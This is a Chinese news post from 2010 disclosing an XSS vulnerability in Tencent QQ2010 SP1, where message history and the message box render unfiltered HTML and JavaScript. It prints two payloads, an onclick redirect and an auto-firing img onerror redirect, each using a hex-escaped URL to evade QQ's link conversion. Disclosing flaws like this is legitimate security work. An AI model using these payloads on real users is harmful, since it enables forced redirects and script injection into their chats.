门户动态 The portal dynamic
当前位置:首页 > 新闻中心 > 门户动态
QQ腾讯2010SP1发布即现严重漏洞
发布日期:2010-07-28 阅读次数:760 字体大小: 标签:腾讯QQ 2010SP 发现漏洞

    腾讯QQ一向是腾讯主打的产品,意想不到前天发布的QQ2010SP1竟然有如此大漏洞。

    首先囧一下:脚本出错还会提示错误

image

    1、消息记录的Javascript、Html标签没有屏蔽

image

    2、消息盒子Javascript、Html标签没有屏蔽

image

    3、小实验

    1、发送代码:

 

以下为引用的内容:
<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />

 

    因为腾讯会自动将url转换,我们必须混淆url才能发送

image

image

image

    4、超牛代码

 

以下为引用的内容:
<img src=’tetet’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>

 

    因为要点击才能触发,想到一个不用点击就能触发的代码。

    5、希望腾讯快点修复,这个漏洞非同小可

    6、本漏洞由TGL发现。

    注意,本代码仅供研究之用,请勿用于不当用途。